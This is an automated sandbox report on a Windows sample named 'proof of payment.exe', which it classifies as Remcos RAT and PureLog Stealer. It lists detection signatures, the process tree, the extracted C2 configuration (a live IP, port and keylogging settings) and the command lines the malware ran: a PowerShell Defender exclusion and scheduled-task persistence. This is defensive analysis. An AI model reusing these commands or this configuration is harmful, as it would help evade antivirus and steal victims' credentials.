Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
proof of payment.exe

Overview

General Information

Sample name:proof of payment.exe
Analysis ID:1435940
MD5:931254205cd64ad16b18fc9b318e2ca6
SHA1:4e5c18fcbf06212d952e084b1b455ecc136e4845
SHA256:05a341a2577c728e8a994775b17b8c5562539146d78a5de948e3534e1ae1c629
Tags:exe
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • proof of payment.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\proof of payment.exe" MD5: 931254205CD64AD16B18FC9B318E2CA6)
    • powershell.exe (PID: 5628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2372 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4020 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • proof of payment.exe (PID: 3640 cmdline: "C:\Users\user\Desktop\proof of payment.exe" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 4600 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 4860 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 4608 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 2564 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 5336 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 6044 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx" MD5: 931254205CD64AD16B18FC9B318E2CA6)
  • NvbYSEq.exe (PID: 4984 cmdline: C:\Users\user\AppData\Roaming\NvbYSEq.exe MD5: 931254205CD64AD16B18FC9B318E2CA6)
    • schtasks.exe (PID: 6896 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NvbYSEq.exe (PID: 6596 cmdline: "C:\Users\user\AppData\Roaming\NvbYSEq.exe" MD5: 931254205CD64AD16B18FC9B318E2CA6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "37.120.235.122:2269:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F9KCYW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x136a8:$a1: Remcos restarted by watchdog!
            • 0x13c20:$a3: %02i:%02i:%02i:%03i
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.proof of payment.exe.5130000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.proof of payment.exe.5130000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.proof of payment.exe.3917800.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  0.2.proof of payment.exe.3917800.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.2.proof of payment.exe.3917800.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x690a8:$a1: Remcos restarted by watchdog!
                    • 0x69620:$a3: %02i:%02i:%02i:%03i
                    Click to see the 39 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", ProcessId: 5628, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", ProcessId: 5628, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NvbYSEq.exe, ParentImage: C:\Users\user\AppData\Roaming\NvbYSEq.exe, ParentProcessId: 4984, ParentProcessName: NvbYSEq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp", ProcessId: 6896, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", ProcessId: 4020, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", ProcessId: 5628, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", ProcessId: 4020, ProcessName: schtasks.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\proof of payment.exe, ProcessId: 3640, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: proof of payment.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                    Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeAvira: detection malicious, Label: HEUR/AGEN.1306895
                    Found malware configuration
                    Source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "37.120.235.122:2269:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F9KCYW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeVirustotal: Detection: 55%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: proof of payment.exeVirustotal: Detection: 55%Perma Link
                    Source: proof of payment.exeReversingLabs: Detection: 60%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: proof of payment.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_00433837
                    Source: proof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_cc0481fc-1

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004074FD _wcslen,CoGetObject,12_2_004074FD
                    Source: proof of payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: proof of payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10006580 FindFirstFileExA,7_2_10006580
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 4x nop then jmp 06912264h8_2_06912321

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 37.120.235.122
                    Source: global trafficTCP traffic: 192.168.2.9:49708 -> 37.120.235.122:2269
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: SECURE-DATA-ASRO SECURE-DATA-ASRO
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
